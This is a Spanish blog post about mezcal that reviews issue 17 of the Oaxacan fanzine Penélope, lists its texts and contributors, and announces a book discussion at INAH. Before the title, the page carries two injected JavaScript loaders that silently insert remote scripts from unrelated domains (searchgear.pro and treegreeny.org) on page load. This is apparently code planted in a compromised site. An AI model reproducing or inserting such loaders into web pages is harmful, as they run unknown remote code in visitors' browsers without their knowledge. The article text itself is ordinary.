;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 186. Fanzine oaxaqueño sobre mezcal

186. Fanzine oaxaqueño sobre mezcal


A fines de abril conocí a César Villegas, miembro del colectivo que edita el fanzine Penélope (penelopefanzine.blogspot.mx), al que me invitó a colaborar en dos de sus números que dedicarían al mezcal. La invitación me entusiasmó, pues la publicación es elaborada por jóvenes oaxaqueños en la que abordan temáticas locales relacionadas con las artes gráficas, el diseño, la política, la literatura y la crítica social.

Durante la plática, le dije a César que, en mi opinión, una tarea esencial y urgente para que los mezcales tradicionales de Oaxaca (y los demás de México) pudieran subsistir, era que los oaxaqueños, que los han consumido por siglos, se los reapropiaran, lo que los obligaba a conocerlos con mayor seriedad y profundidad, y hacer lo necesario para que mantuvieran su calidad y así evitar que la comercialización inescrupulosa continuara destruyéndolos.

El miércoles 3 de julio tuve en mis manos el número 17 de Penélope, correspondiente a junio de 2013 (edición especial mezcal-agave que tendrá continuación en el #18), donde aparecen los siguientes textos:

1. El tlacuache, el fuego y el mezcal, de Juan de Dios Gómez;

2. El mezcal, poema de Marisol Niño de Rivera;

3. Mezcal, ¿bebida prehispánica?, de Ulises Torrentera;

4. Tepextate (infrabiología), de Oscar Tanat;

5. Luna, pulque y conejos: culto ancestral mesoamericano, de Patricia Ledesma y Claudia Loera;

6. En medio de la inmensa oscuridad, de Paul Meixueiro;

7. Karwinskii Effectus, de la redacción.

8. Los mezcales tradicionales de México, de quien esto escribe.

En la parte gráfica, los colaboradores fueron Alberto Cruz, Hernán Hernández, Natural Valius, Félix Monterrosa, Aarón López y Eduardo Ramírez; el diseño de portada fue de Manu Prinster.

El lunes 8, a las 11 horas, continuará la presentación y análisis de los ensayos del libro Patrimonio Inmaterial. Ámbitos y contradicciones. (www.milenio.com/cdb/doc/impreso/9183590). Será en la Coordinación Nacional de Antropología del INAH: Av. San Jerónimo 880, San Jerónimo Lídice, DF.

http://www.milenio.com/cdb/doc/impreso/9185449

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *